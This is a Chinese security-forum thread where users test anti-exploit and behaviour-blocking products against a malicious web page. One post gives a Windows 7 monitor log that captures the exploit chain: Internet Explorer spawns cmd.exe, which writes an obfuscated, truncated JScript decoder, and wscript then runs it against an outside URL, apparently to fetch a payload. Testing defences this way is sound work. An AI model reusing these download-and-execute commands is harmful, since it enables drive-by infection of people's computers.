再来一个挂马网页，想测试主防的来（HMPA、Malwarebytes Anti-Exploit已测试）

yi731224

我来试下

liulangzhecgr

win7 x32  基本用户运行系统

2016/11/9 09:13:18    修改注册表值    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url1
值: http://wickcommunications.com/
规则: [应用程序组]浏览器 -> [注册表]*

2016/11/9 09:14:00    创建文件    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: C:\Users\yiqing\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CA09VZ1W\third-party.min[1].js
规则: [应用程序组]浏览器 -> [应用程序]c:\program files\internet explorer\iexplore.exe -> [文件组]所有执行文件 -> [文件]*; *.js

2016/11/9 09:14:10    修改注册表值    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url2
值: http://bbs.kafan.cn/
规则: [应用程序组]浏览器 -> [注册表]*

2016/11/9 09:15:53    创建新进程    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd.exe /q /c cd /d "%tmp%" && echo function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=(/*a*/255),a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g.length)^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromC"+"harCode";e^<n.length;e++)a=a
规则: [应用程序组]系统辅助程序

2016/11/9 09:16:43    创建文件    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: C:\Users\yiqing\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNNMD9A0\wick-communications-icon[1].jpg
规则: [应用程序组]浏览器 -> [应用程序]c:\program files\internet explorer\iexplore.exe -> [文件组]防勒索文件 -> [文件]?:\*; *.jpg

2016/11/9 09:17:26    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\wscript.exe
命令行: wscript  //B //E:JScript MXj6sFosp "gexywoaxor" "http://daa.1127greenbriar.com/?sourceid=mozilla&aqs=mozilla.110o68.406u9v0&q=wHrQMvXcJwDKFYbGMvrETqNbNknQA0aPxpH2_drWdZqxKGni1-b5UUSk6FuCEh3ho&es_sm=106&oq=_YrKOFRbgDihEHTLgw3yopeWwlAo_yvh0OEmx6dhZeA9UGLNQp1-Zq
规则: [应用程序组]病毒测试

2016/11/9 09:17:39    读文件夹    允许
进程: c:\windows\system32\wscript.exe
目标: C:\Users\yiqing\AppData\Local\Temp\Low
规则: [应用程序组]病毒测试 -> [文件]*

2016/11/9 09:17:54    创建注册表项    允许
进程: c:\windows\system32\wscript.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
规则: [应用程序组]病毒测试 -> [注册表]*

2016/11/9 09:18:06    创建注册表项    允许
进程: c:\windows\system32\wscript.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host
规则: [应用程序组]病毒测试 -> [注册表]*

墨家小子

liulangzhecgr 发表于 2016-11-9 09:38
win7 x32  基本用户运行系统

主流X64的今天我只能给你+10086了

wh759626933

AVG MISS
不是exe，怎么测IDP